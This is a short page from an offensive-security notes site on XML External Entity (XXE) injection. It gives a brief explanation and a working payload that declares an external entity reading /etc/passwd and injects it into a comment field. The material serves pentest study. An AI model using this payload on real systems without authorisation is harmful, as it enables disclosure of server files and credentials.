TurboWindX
  • Welcome
  • Hacking Methodologies
    • Known Tools & Technologies
    • Kill Chain
    • Phyisical and hardware
      • Full Screen Escape
  • Checklist - WebApps
  • Checklist - Windows
  • External Recon
    • Ports & services scanning
    • Web Recon
      • CMS
        • Wordpress
      • Path traversal & LFI/RFI
      • XSS - Cross site scripting
      • XML External Entity - XXE
  • Internal Recon
    • Active Directory
  • Post Exploitation
    • Container/Sandbox Breakout
    • Privilege Escalation
      • Hashing & Cracking
    • Persistence
      • Windows
    • Data Exfiltration
      • Steganography
      • Pivot & Tunneling
  • Shells
  • Protocols
    • FTP
    • SSH
    • DNS
    • IPP
  • Binary Exploitation
    • Linux - Simple reverse & crack
  • Memory Analysis
  • Forensics
  • Android & iOS
  • Database Injection & Exploitation
  • DDoS
  • Kubernetes & Docker
  • Phish
Powered by GitBook
On this page

Was this helpful?

  1. External Recon
  2. Web Recon

XML External Entity - XXE

From modifying an XML payload controlled by us, the user, we might be able to tell the XML parser to go and grab some data that we were not supposed to have access to. 

<?xml version="1.0" encoding="UTF-8"?>
<comment>
  <name>Jesus</name>
  <author>Boy</author>
  <com>blog post</com>
</comment>
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
   <!ELEMENT data ANY >
   <!ENTITY name SYSTEM "file:///etc/passwd" >]>
<comment>
  <name>&name;</name>
  <author>Spongebob</author>
  <com>random stuff</com>
</comment>

PreviousXSS - Cross site scriptingNextInternal Recon

Last updated 3 years ago

Was this helpful?